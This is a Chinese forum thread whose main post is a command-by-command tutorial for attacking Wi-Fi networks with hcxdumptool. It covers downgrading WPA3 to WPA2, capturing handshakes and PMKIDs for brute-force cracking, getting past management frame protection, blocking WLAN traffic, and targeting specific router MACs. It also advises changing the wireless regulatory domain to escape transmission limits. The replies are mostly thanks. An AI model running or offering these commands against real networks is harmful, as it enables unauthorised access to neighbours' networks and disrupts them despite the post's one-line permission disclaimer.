ubnt解决方案
查看: 6123|回复: 62

攻击WPA3降级从而捕获为WP2握手包

[复制链接]

3362

回帖

2万

积分

4795 小时

在线时间

大校

注册时间
2015-5-1
金币
16904 个
威望
12 个
荣誉
1 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2024-1-17 15:49 |显示全部楼层
本帖最后由 上上网 于 2024-2-18 17:02 编辑

声明:  使用此工具前,你必须有攻击网络的权限, 执行久化攻击会导致附近网络阻塞甚至瘫痪, 如果由此导致不可评估后果, 所有法律责任由实施者承担。

那些 水滴 奶瓶 CDLINUX 等 淘汰工具随着时代进化, 一些功能已经跟不上了

一种具有降级攻击主动交互式工具。与使用传统Deauth帧注入不同,在捕获过程中,它具有主动发送请求交互功能,确保PSK能被恢复,
如果你捕获握手包非常困难情况, 可以偿试使用, 可能会有怀孕惊喜哦

亮点1:对 一些wifi6 具有WPA3协议的实施降级攻击,捕获的为WPA2握手包,从而仍然可以使用暴力方式破解

亮点2:对一些路由器具有管理帧保护(MFP)的攻击有效,使用其他一些传统Deauth帧注入工具不能捕获这类路由器
,
亮点3:能够从接入点捕获 PMKID

亮点4:可以看到捕获消息, 从而可以知道是否捕获了有效握手包

亮点5:可以实现包含GPS定位等数据信息,(海拨,经度,纬度 等等)

亮点6:具有漫游密钥过度管理功能路由器协议(FT PSK不支持破解),  捕获为WPA2握手

亮点7:能够在2.4GHz上捕获5/6GHz客户端的握手

亮点8:能够捕获来自未连接客户端的握手

亮点9:能够从 WLAN 流量中捕获密码

亮点10:能够阻止完整的 WLAN 流量传输

亮点11:使用随机化MAC地址

亮点12:支持大多数主流用于破解网卡

在初始使用它前,   如果想少走弯路, 都应该继续阅读下去 .  .   .  
由于本篇内容涉及到BPF过滤波器使用, 需要一些802.x1基本知识, 例如需了解 addr1 addr2 addr3

如何在kali使用?  就kali2023-4 为例吧   wifislax64-3.4-final也行
工具hcxdumptool 6.3.2
  下载安装最新
依次执行以下命令安装
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool-master
sudo make && sudo make install

有下不了的情况,  下载这个文件放进 KALI 或wifislax64-3.4-final 系统里面任何位置,  然后执行上面命令安装也行



停止接口的服务 (如果需要)
停止
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
开启 (如果需要)
sudo systemctl start NetworkManager

查看国家无线监管域信息
iw reg get

注意: 无线监管域设置是极其重要, 某些监管域信道被限制不允许传输某些数据,  所以它决定了捕获握手是否成功. 失败的重要因素,如检测到雷达,将不会传输
如果检测到国家域代码为00:DFS-UNSET  和监管域:00,       可能会在5GHz和部分2.4GHz 信道上可能无法按预期工作, (会无法捕获在某些被限制频段握手)
抓不了就偿试变换到不同监管域码再进行捕获: 例如: IN(受限极小)   或其他受限制极小国家
执行设置监管域码  例如: IN
sudo iw reg set IN
这不是持久化步骤,  需要持久化必须在配置文件中取消对域注释

通过改变监管域码看到网卡发生了巨大变化, 可以看到下图中完全没有限制在某些频段中传输数据

以上仅是无线监管域部分小知识 , 也是数据是否可以顺利传输最重要一环节


接下来  .
查看一下你要使用网卡接口编号是否对应, 通常接口是默认 wlan0
sudo hcxdumptool -l       或     sudo hcxdumptool -L
查看对应网卡信息命令  sudo hcxdumptool -I wlan0

开始执行捕获命令所有信号握手, ( 如果网卡接口编号是 wlan0 )
sudo hcxdumptool -i wlan0  -F --rds=1
从2.4ghz到5ghz历遍一次攻击周期约1-2分钟 ,  -i wlan0  网卡接口位,   -F 使用网卡支持所有频段,  --rds=1 排序,  文件名称会自动默认使用日期时间命名,  如要指定文件名加参数-w SSID.pcapng  可用SSID 或MAC DCAEFB命名
如果信号较差,  又必需要捕获到有效握手,  增大重新攻击重试,  默认值是:    attemptapmax=4    attemptclientmax=10   
sudo hcxdumptool -i wlan0  -F --rds=1  --attemptclientmax=100 --attemptapmax=100
此时弹出窗口会显示是否捕获到握手详细数据信息示例, 看下图解析





如果要攻击单个路由器
1 > 扫描,     分普通模式 --rcascan=p  及主动模式 --rcascan=a  如果网卡支持主动监控, 主动模式扫描会有信标响应,  可按探测响应计数排序--rds=1
扫描网卡支持2.4Ghz+5Ghz所有信道参数 -F    如不加参数-F 只扫描1, 6, 11信道
sudo hcxdumptool  -i wlan0  -F  --rcascan=a  --rds=1

或仅扫描指定2.Ghz信道,  不扫描5Ghz信道不用加参数-F  注意对应信道频带: 2.4g信道要加a
sudo hcxdumptool -i wlan0  --rds=1 --rcascan=a -c 1a,2a,3a,4a,5a,6a,7a,8a,9a,10a,11a,12a,13a,14a

2 > 设置要指定网卡编号为监控模式(如果有插入多块网卡,要对应你自己网卡接口位 -i wlan0),  如果创建BPF过滤器失败, 需要执行一下这命令
sudo hcxdumptool -m wlan0

3 > 创建BPF过滤器,  攻击单个目标MAC:    00:00:00:00:00:00, 按实际自己要攻击MAC地址填写为准, 这只是示例 !
创建BPF命令
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00  -ddd  >g.bpf

或添加无向探测获取更多信息,   或有助于密码破解  加这固定MAC:    ff:ff:ff:ff:ff:ff
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd  >g.bpf

如果要攻击2个目标路由器MAC
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 99:bb:99:bb:bb:99  or wlan addr3 ff:ff:ff:ff:ff:ff -ddd  >g.bpf

4 > 然后使用伯克利BPF过滤器,执行捕获单个或多个MAC握手命令
sudo hcxdumptool -i wlan0  -F --bpf=g.bpf

有经验用户如要使用对应信道参数-c  ,    如11  165信道 -c 11a,165b  指定信道情况下不需加-F参数,  更准确地攻击,以减少网卡活动周期优化时间
注意对应信道频带: 2.4g信道要加a  5g信道要加b  6g信道要加c  是必须,   因为WiFi5,6不是唯一信道 。
执行命令
sudo hcxdumptool -i wlan0  -c 11a,165b  --bpf=g.bpf

如果要保护自己MAC路由器,  需要创建自己路由器MAC保护
sudo tcpdump -i wlan0 not wlan addr2 cc:cc:cc:cc:cc:cc -ddd >p.bpf
然后执行保护自己,   捕获除自己外所有在范围内握手包
sudo hcxdumptool -i wlan0  -F --rds=1  --bpf=p.bpf



补充捕获5Ghz信号步骤
捕获在你5Ghz网卡支持频段范围内所有信号握手, 由于5Ghz网卡信道活动周期较长, 需较多时间
sudo hcxdumptool -i wlan0 -F  --rds=1

如果要攻击5Ghz单个路由器信号
扫描:  分普通模式--rcascan=p  及主动模式--rcascan=a    如果网卡支持主动监控, 主动模式扫描时会有信标响应, 按探测响应计数排序--rds=1
扫描网卡支持所有信道参数 -F
sudo hcxdumptool  -i wlan0  -F  --rcascan=a  --rds=1

或扫描指定5Ghz以上信道,  5g信道要加b  6g信道加c
sudo hcxdumptool -i wlan0  --rds=1  --rcascan=a -c 36b,38b,40b,42b,44b,46b,48b,50b,52b,54b,56b,58b,60b,62b,64b,100b,102b,104b,106b,108b,100b,112b,114b,116b,118b,120b,122b,124b,126b,128b,130b,132b,134b,136b,138b,140b,149b,151b,153b,155b,157b,159b,161b,163b,165b,167b,169b,171b,173b,175b,177b,179b

创建要攻击5Ghz MAC:    00:00:00:00:00:00,  按自己要攻击5Ghz MAC地址填写为准, 这只是示例 !
创建BPF, 可同时监听捕获2.4Ghz和5Ghz握手信号, 只需将路由器2个MAC创建加入BPF过滤器即可, 当攻击掉线时, 无论客户端连接上那个信号都能捕获到它们
创建1个要攻击MAC进BPF过滤器
sudo tcpdump -i wlan0 wlan addr3 000000000003  -ddd  >g.bpf

或创建2.4Ghz和5Ghz路由器MAC进过滤器 2.4Ghz MAC:    00:00:00:00:00:00      5Ghz MAC:    00:00:00:00:00:02
sudo tcpdump -i wlan0 wlan addr3 00:00:00:00:00:00 or wlan addr3 00:00:00:00:00:02 -ddd  >g.bpf
执行命令
sudo hcxdumptool -i wlan0 -F  --bpf=g.bpf

或指定对应信道参数攻击更准确,   如11  165信道       -c 11a,165b  以减少网卡活动周期优化时间
注意对应信道频带: 2.4g信道加a  5g信道加b  6g信道加c  是必须,   因为WiFi5,6不是唯一信道 。
然后执行命令
sudo hcxdumptool -i wlan0  -c 11a,165b  --bpf=g.bpf


最后等待一下就可捕获到握手包了,  如果在2分钟内捕获不了握手情况(信号好的一般在30秒内即可捕获握手,), 此时就应重新检查MAC是否与信号对应,   或停止后再次重新执行捕获命令,  或检查无线监管域, 硬件, 网卡, 驱动, 系统 等等,  需要重新插拨USB接口网卡重试,有可能这原因导致的, 特别是在会被无线监管域限制的频段内导致传输失败
不推荐在虚拟机系统使用该工具,有可能因为虚拟接口产生较多问题,  推荐物理硬盘启动, 如U盘启动Kali 内核>6.5  wifislax64 等
捕获文件默认在Home文件夹下 !文件名称是以日期时间命名,    文件格式是pcapng固定格式


以下是旧版< 低于hcxdumptool 6.2.8 一些简单捕获握手命令
1> 扫描
sudo hcxdumptool -i wlan0 --do_rcascan

2> 将网卡设置为监控模式
sudo hcxdumptool -m wlan0

3> 捕获在范围内所有信号握手包
sudo hcxdumptool -i  wlan0  -o TP.pcapng --enable_status=15

如写的有不当之处或错误,  请遵循各个版本的hcxdumptool -help为准




补充内容 (2024-5-28 11:23):
自 hcxdumptool6.3.2 之后起版本, 需要安装libpcap依赖
执行以下命令
sudo apt-get update
sudo apt install -y libpcap-dev

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册 微信登录

x

评分

2

查看全部评分

63

回帖

512

积分

34 小时

在线时间

中尉

注册时间
2013-5-20
金币
446 个
威望
0 个
荣誉
0 个
累计签到:62 天
连续签到:2 天
[LV.100]试剑无线
发表于 2024-1-19 16:13 |显示全部楼层
感谢大佬的分享
回复

使用道具 举报

209

回帖

895

积分

172 小时

在线时间

中尉

注册时间
2014-3-11
金币
647 个
威望
1 个
荣誉
1 个
累计签到:111 天
连续签到:2 天
[LV.200]无线新星
发表于 2024-1-17 21:20 |显示全部楼层
抓到包子是不是 .22000 格式的?
回复

使用道具 举报

63

回帖

512

积分

34 小时

在线时间

中尉

注册时间
2013-5-20
金币
446 个
威望
0 个
荣誉
0 个
累计签到:62 天
连续签到:2 天
[LV.100]试剑无线
发表于 2024-1-17 19:58 |显示全部楼层
感谢大佬的无私分享哈
回复

使用道具 举报

866

回帖

3454

积分

1688 小时

在线时间

少校

注册时间
2010-3-6
金币
2406 个
威望
0 个
荣誉
0 个
累计签到:24 天
连续签到:1 天
[LV.50]初入江湖
发表于 2024-1-17 17:16 |显示全部楼层
不明觉厉
回复

使用道具 举报

387

回帖

1万

积分

981 小时

在线时间

上校

优秀会员30天持久勋章

注册时间
2011-3-7
金币
10554 个
威望
16 个
荣誉
5 个
累计签到:868 天
连续签到:15 天
[LV.1095]铁杆粉丝
发表于 2024-1-17 18:10 |显示全部楼层
nice; Learning; thank you for sharing
回复

使用道具 举报

3362

回帖

2万

积分

4795 小时

在线时间

大校

注册时间
2015-5-1
金币
16904 个
威望
12 个
荣誉
1 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2024-1-18 10:44 |显示全部楼层
马上成功 发表于 2024-1-17 21:20
抓到包子是不是 .22000 格式的?

pcapng
回复

使用道具 举报

209

回帖

895

积分

172 小时

在线时间

中尉

注册时间
2014-3-11
金币
647 个
威望
1 个
荣誉
1 个
累计签到:111 天
连续签到:2 天
[LV.200]无线新星
发表于 2024-1-18 17:42 |显示全部楼层
不知道咋回事,打不开github的网站了,难道要富强
回复

使用道具 举报

111

回帖

3452

积分

408 小时

在线时间

少校

注册时间
2023-2-24
金币
3297 个
威望
0 个
荣誉
0 个
累计签到:319 天
连续签到:1 天
[LV.365]无线熟人
发表于 2024-1-19 23:56 |显示全部楼层
学习学习
回复

使用道具 举报

111

回帖

3452

积分

408 小时

在线时间

少校

注册时间
2023-2-24
金币
3297 个
威望
0 个
荣誉
0 个
累计签到:319 天
连续签到:1 天
[LV.365]无线熟人
发表于 2024-1-20 00:14 |显示全部楼层
访问不了网址
回复

使用道具 举报

121

回帖

5996

积分

510 小时

在线时间

中校

注册时间
2016-3-20
金币
5789 个
威望
5 个
荣誉
0 个
累计签到:184 天
连续签到:1 天
[LV.200]无线新星
发表于 2024-1-20 05:42 来自手机 |显示全部楼层
学习学习
回复

使用道具 举报

3362

回帖

2万

积分

4795 小时

在线时间

大校

注册时间
2015-5-1
金币
16904 个
威望
12 个
荣誉
1 个
累计签到:1 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2024-1-20 10:37 |显示全部楼层
本帖最后由 上上网 于 2024-1-20 10:39 编辑

将文件下来放在上面了,下不了的可以下题中那个文件放进kali 或wifislax 中去,cd进目录后执行安装命令就行
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-12-19 20:08

返回顶部 返回列表